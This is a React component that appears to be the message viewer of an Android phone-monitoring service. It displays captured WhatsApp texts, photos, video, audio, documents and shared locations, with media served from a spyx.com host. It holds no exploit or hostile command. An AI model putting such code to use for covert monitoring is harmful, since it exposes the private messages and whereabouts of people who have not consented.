// ** React Imports
import { useRef, useEffect, useState, useMemo } from 'react'
import GoogleMapReact from 'google-map-react'

// ** MUI Imports
import Icon from 'src/@core/components/icon'

import Box from '@mui/material/Box'
import { styled } from '@mui/material/styles'
import Typography from '@mui/material/Typography'

// ** Third Party Components
import PerfectScrollbarComponent from 'react-perfect-scrollbar'

import Image from 'next/image'

import dayjs from 'dayjs'

import { Modal, Spin } from 'antd'

import { useDispatch, useSelector } from 'react-redux'

import { selectMessage, setPerViewImage, fetchChatsContacts, removeSelectedChat } from 'src/store/apps/android-whatsapp'
import NoData from 'src/components/NoData'

const PerfectScrollbar = styled(PerfectScrollbarComponent)(({ theme }) => ({
  padding: theme.spacing(5)
}))

const AnyReactComponent = ({ text }) => (
  <div className=' '>
    <div className='relative flex '>
      <div className=' absolute w-[180px] h-[40px] -mt-8 -ml-[70px] text-[13px] flex items-center  text-center text-[#4d5976] text-opacity-90 font-[500] bg-white  rounded-lg'>
        {text}
      </div>
      <div className='absolute flex items-center justify-center'>
        <Icon icon='material-symbols:location-on-rounded' width={50} height={50} className='text-[#FF5252]'></Icon>
      </div>
    </div>
  </div>
)

const MessagesLog = props => {
  // ** Props
  const { hidden } = props

  let data = useSelector(state => state.androidWhatsapp.selectedMessage)

  const [flag, setFlag] = useState(false)

  // ** Ref
  const chatArea = useRef(null)

  // ** Scroll to chat bottom
  const scrollToBottom = () => {
    if (chatArea.current) {
      if (hidden) {
        // @ts-ignore
        chatArea.current.scrollTop = Number.MAX_SAFE_INTEGER
      } else {
        // @ts-ignore
        chatArea.current._container.scrollTop = Number.MAX_SAFE_INTEGER
      }
    }
  }

  // 记录首次加载
  const [isFirstLoad, setIsFirstLoad] = useState(true)

  useEffect(() => {
    if (data && data.chat && data.chat.length) {
      scrollToBottom()
      setIsFirstLoad(false)
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [data])

  // ** Renders user chat
  const renderChats = () => {
    if (data.selected.length == 0) {
      if (data.contact.snippet == '') {
        return (
          <div
            style={{
              background: '#F5F5F5',
              fontSize: '26px',
              display: 'flex',
              justifyContent: 'center',
              alignItems: 'center',
              color: '#666',
              height: '100%'
            }}
          >
            <NoData />
          </div>
        )
      } else {
        return (
          <div
            style={{
              fontSize: '16px',
              display: 'flex',
              flexDirection: 'column',
              alignItems: 'center',
              marginTop: '10px',
              color: '#666',
              height: '100%',
              padding: '0 10px'
            }}
          >
            <p style={{ fontSize: '13px' }}> {dayjs(data.contact.snippetTimestamp).format('YYYY-MM-DD')}</p>
            <span> {data.contact.snippet}</span>
          </div>
        )
      }
    }

    return data.selected.map((item, index) => {
      const isSender = item.isFromMe

      const time = item.time

      return (
        <Box
          key={index}
          sx={{
            display: 'flex',
            flexDirection: !item.isFromMe ? 'row' : 'row-reverse'
          }}
        >
          <Box
            className='chat-body'
            sx={{ maxWidth: ['calc(100% - 5.75rem)', '75%', '65%'], minWidth: '74px', position: 'relative' }}
          >
            <Box key={index} sx={{ '&:not(:last-of-type)': { mb: 3.5 } }}>
              {item.sender != '' ? (
                <span style={{ color: '#9ca3af', fontSize: '13px', position: 'relative', bottom: '-8px' }}>
                  {item.sender}
                </span>
              ) : null}
              <div className=''>
                <Box
                  sx={{
                    boxShadow: 1,
                    borderRadius: 1,
                    width: 'fit-content',
                    p: theme => theme.spacing(0, 2),
                    ml: isSender ? 'auto' : undefined,
                    borderTopLeftRadius: !isSender ? 0 : undefined,
                    borderTopRightRadius: isSender ? 0 : undefined,
                    color: isSender ? 'black' : 'text.primary',
                    backgroundColor: isSender ? '#D1FAE5' : '#F3F4F6',
                    mb: 4.4,
                    mt: 2
                  }}
                >
                  {(() => {
                    if (item.messageType === 0) {
                      return (
                        <div className=' flex p-2 '>
                          <div>
                            <span
                              className='font-semibold text-[0.8rem] text-black text-opacity-80 '
                              style={{ display: 'inline-block', maxWidth: '400px', overflow: 'hidden' }}
                            >
                              {item.text}
                            </span>
                          </div>
                          <div
                            className='absolute  bottom-0 right-0'
                            style={{
                              width: '120px',
                              left: !item.isFromMe ? '0' : 'unset',
                              right: item.isFromMe ? '0' : 'unset'
                            }}
                          >
                            <h2 variant='caption' sx={{ color: 'text.disabled' }}>
                              <p className=' text-[#9CA3AF] text-[0.6rem] '>{time}</p>
                            </h2>
                          </div>
                        </div>
                      )
                    } else if (item.messageType === 1 || item.messageType === 2) {
                      let type = item.attachment.url
                      let tem = type.split('.')

                      let suffix = tem
                        .slice(tem.length - 1, tem.length)
                        .toString(String)
                        .split('.')
                      suffix = suffix[0].toLowerCase()

                      if (suffix === 'jpg' || suffix === 'png') {
                        return (
                          <div className=' flex p-2 '>
                            <div>
                              <span className='font-semibold text-[0.8rem] text-black text-opacity-80'>
                                <Image
                                  src={'https://cos.spyx.com/' + item.attachment.url}
                                  alt='Picture of the author'
                                  width={150}
                                  height={150}
                                  style={{ cursor: 'pointer' }}
                                  onClick={() => {
                                    dispatch(
                                      setPerViewImage({
                                        open: true,
                                        url: `https://cos.spyx.com/${item.attachment.url}`
                                      })
                                    )
                                  }}
                                />
                              </span>
                            </div>
                            <div className='absolute  bottom-0 right-0 '>
                              <h2 variant='caption' sx={{ color: 'text.disabled' }}>
                                <p className=' text-[#9CA3AF] text-[0.6rem] '>{time}</p>
                              </h2>
                            </div>
                          </div>
                        )
                      } else if (suffix === 'mp4' || suffix === 'mov') {
                        return (
                          <div className=' flex p-2 '>
                            <div>
                              <span className='font-semibold text-[0.8rem] text-black text-opacity-80 '>
                                <video
                                  controls={true}
                                  autoPlay={false}
                                  id='video'
                                  preload='none'
                                  loop={false}
                                  muted={false}
                                >
                                  can not be used Video
                                  <source src={'https://cos.spyx.com/' + item.attachment.url} type='video/mp4' />
                                  <source src='movie.ogg' type='video/ogg' />
                                </video>
                              </span>
                            </div>
                            <div className='absolute  bottom-0 right-0 '>
                              <h2 variant='caption' sx={{ color: 'text.disabled' }}>
                                <p className=' text-[#9CA3AF] text-[0.6rem] '>{time}</p>
                              </h2>
                            </div>
                          </div>
                        )
                      } else if (suffix === 'mp4' || suffix === 'mov') {
                      }
                    } else if (item.messageType === 3) {
                      return (
                        <>
                          <audio controls>
                            <source src={'https://cos.spyx.com/' + item.attachment.url} type='audio/mpeg' />
                            <embed height='50' width='100' src={'https://cos.spyx.com/' + item.attachment.url}></embed>
                          </audio>
                        </>
                      )
                    } else if (item.messageType === 5) {
                      return (
                        <div style={{ height: '300px', width: '300px' }}>
                          <GoogleMapReact
                            bootstrapURLKeys={{ key: process.env.NEXT_PUBLIC_GOOGLE_KEY }}
                            defaultCenter={{
                              lat: item.attachment.latitude,
                              lng: item.attachment.longitude
                            }}
                            defaultZoom={15}
                          >
                            <AnyReactComponent
                              lat={item.attachment.latitude}
                              lng={item.attachment.longitude}
                              text={item.attachment.vcardName}
                            />
                          </GoogleMapReact>
                        </div>
                      )
                    } else if (item.messageType === 8) {
                      return (
                        <div className=' flex p-2 '>
                          <div>
                            <span className='font-semibold text-[0.8rem] text-black text-opacity-80 '>
                              <a href={'https://cos.spyx.com/' + item.attachment.url}>
                                <Icon icon='mdi:file-word'></Icon>
                              </a>
                            </span>
                          </div>
                          <div className='absolute  bottom-0 right-0 '>
                            <h2 variant='caption' sx={{ color: 'text.disabled' }}>
                              <p className=' text-[#9CA3AF] text-[0.6rem] '>{time}</p>
                            </h2>
                          </div>
                        </div>
                      )
                    } else if (item.messageType === 15) {
                      return (
                        <div className=' flex p-2 '>
                          <div>
                            <span className='font-semibold text-[0.8rem] text-black text-opacity-80'>
                              <Image
                                src={'https://cos.spyx.com/' + item.attachment.url}
                                alt='Picture of the author'
                                width={150}
                                height={150}
                                style={{ cursor: 'pointer' }}
                                onClick={() => {
                                  dispatch(
                                    setPerViewImage({
                                      open: true,
                                      url: `https://cos.spyx.com/${item.attachment.url}`
                                    })
                                  )
                                }}
                              />
                            </span>
                          </div>
                          <div className='absolute  bottom-0 right-0 '>
                            <h2 variant='caption' sx={{ color: 'text.disabled' }}>
                              <p className=' text-[#9CA3AF] text-[0.6rem] '>{time}</p>
                            </h2>
                          </div>
                        </div>
                      )
                    }
                  })()}
                  {/* {item.messageType === 0 ? (
                    <div className=' flex p-2 '>
                      <div>
                        <span className='font-semibold text-[0.8rem] text-black text-opacity-80 '>{item.text}</span>
                      </div>
                      <div className='absolute  bottom-0 right-0 '>
                        <h2 variant='caption' sx={{ color: 'text.disabled' }}>
                          <p className=' text-[#9CA3AF] text-[0.6rem] '>{time}</p>
                        </h2>
                      </div>
                    </div>
                  ) : (
                    <Image src={item.img} alt='Picture of the author' width={150} height={150} />
                  )} */}
                </Box>
              </div>
            </Box>
          </Box>
        </Box>
      )
    })
  }

  const ScrollWrapper = ({ children }) => {
    if (hidden) {
      return (
        <PerfectScrollbar
          ref={chatArea}
          options={{ wheelPropagation: false }}
          onYReachEnd={container => {
            if (store.selectedMessage.selected.length >= store.rightTotalCount) return
            dispatch(selectMessage())
          }}
        >
          {children}

          {flag ? (
            <div style={{ display: 'flex', justifyContent: 'center' }}>
              <Spin />
            </div>
          ) : null}
        </PerfectScrollbar>
      )
    } else {
      return (
        <PerfectScrollbar
          ref={chatArea}
          options={{ wheelPropagation: false }}
          onYReachEnd={container => {
            if (store.selectedMessage.selected.length >= store.rightTotalCount) return
            dispatch(selectMessage())
          }}
        >
          {children}

          {flag ? (
            <div style={{ display: 'flex', justifyContent: 'center' }}>
              <Spin />
            </div>
          ) : null}
        </PerfectScrollbar>
      )
    }
  }

  const store = useSelector(state => state.WhatsApp)

  const dispatch = useDispatch()

  const [scroll, setScroll] = useState(0)

  useEffect(() => {
    if (scroll >= 100) {
      if (store.selectedMessage.selected.length >= store.rightTotalCount) return
      dispatch(selectMessage())
      setFlag(true)
      setTimeout(() => {
        setFlag(false)
      }, 1000)
    }
  }, [scroll])

  return (
    <>
      <Box sx={{ height: 'calc(100% - 60px)' }} className='bg-bgImg'>
        {/* <ScrollWrapper>{renderChats()}</ScrollWrapper> */}
        {/* {useMemo(
          () => (
            <ScrollWrapper>{renderChats()}</ScrollWrapper>
          ),
          [data]
        )} */}

        {hidden ? (
          <PerfectScrollbar
            ref={chatArea}
            options={{ wheelPropagation: false }}
            onScrollY={(e) => {
              const progress = (e.scrollTop / (e.scrollHeight - e.clientHeight) * 100).toFixed(0)

              if (!isFirstLoad && progress >= 100) {
                setScroll(progress)
              }
            }}
          >
            {renderChats()}

            {flag ? (
              <div style={{ display: 'flex', justifyContent: 'center' }}>
                <Spin />
              </div>
            ) : null}
          </PerfectScrollbar>
        ) : (
          <PerfectScrollbar
            ref={chatArea}
            options={{ wheelPropagation: false }}
            onScrollY={(e) => {
              const progress = (e.scrollTop / (e.scrollHeight - e.clientHeight) * 100).toFixed(0)

              if (!isFirstLoad && progress >= 100) {
                setScroll(progress)
              }
            }}
          >
            {renderChats()}

            {flag ? (
              <div style={{ display: 'flex', justifyContent: 'center' }}>
                <Spin />
              </div>
            ) : null}
          </PerfectScrollbar>
        )}
      </Box>

      <Modal
        title=''
        open={store.preViewImage.open}
        onCancel={() => {
          dispatch(
            setPerViewImage({
              open: false,
              url: ``
            })
          )
        }}
        width='540px'
        footer={[]}
      >
        <div style={{ padding: '14px' }}>
          <Image
            src={store.preViewImage.url}
            width={200}
            height={200}
            style={{ width: '460px', height: 'auto' }}
            alt='preview'
          ></Image>
        </div>
      </Modal>
    </>
  )
}

export default MessagesLog
